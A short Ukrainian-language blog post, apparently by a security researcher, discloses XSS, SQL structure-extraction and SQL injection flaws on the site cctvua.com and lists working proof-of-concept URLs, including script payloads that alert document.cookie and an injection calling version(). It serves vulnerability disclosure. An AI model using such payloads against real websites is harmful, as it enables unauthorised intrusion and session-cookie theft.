Нові уразливості на www.cctvua.com
19:16 14.05.201031.10.2009
У березні, 09.03.2009, я знайшов Cross-Site Scripting, SQL DB Structure Extaction та SQL Injection уразливості на секюріті проекті http://www.cctvua.com. Про що найближчим часом сповіщу адміністрацію проекту.
Раніше я вже писав про уразливості на www.cctvua.com.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
14.05.2010
XSS:
http://www.cctvua.com/?p=202989;c=1;s=28/*%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.cctvua.com/?p=202989;c=0/*%3Cscript%3Ealert(document.cookie)%3C/script%3E;s=28
SQL DB Structure Extraction:
http://www.cctvua.com/?p=1;a=1′
SQL Injection:
http://www.cctvua.com/?p=1;a=version()
Зараз даний сайт вже не робить.
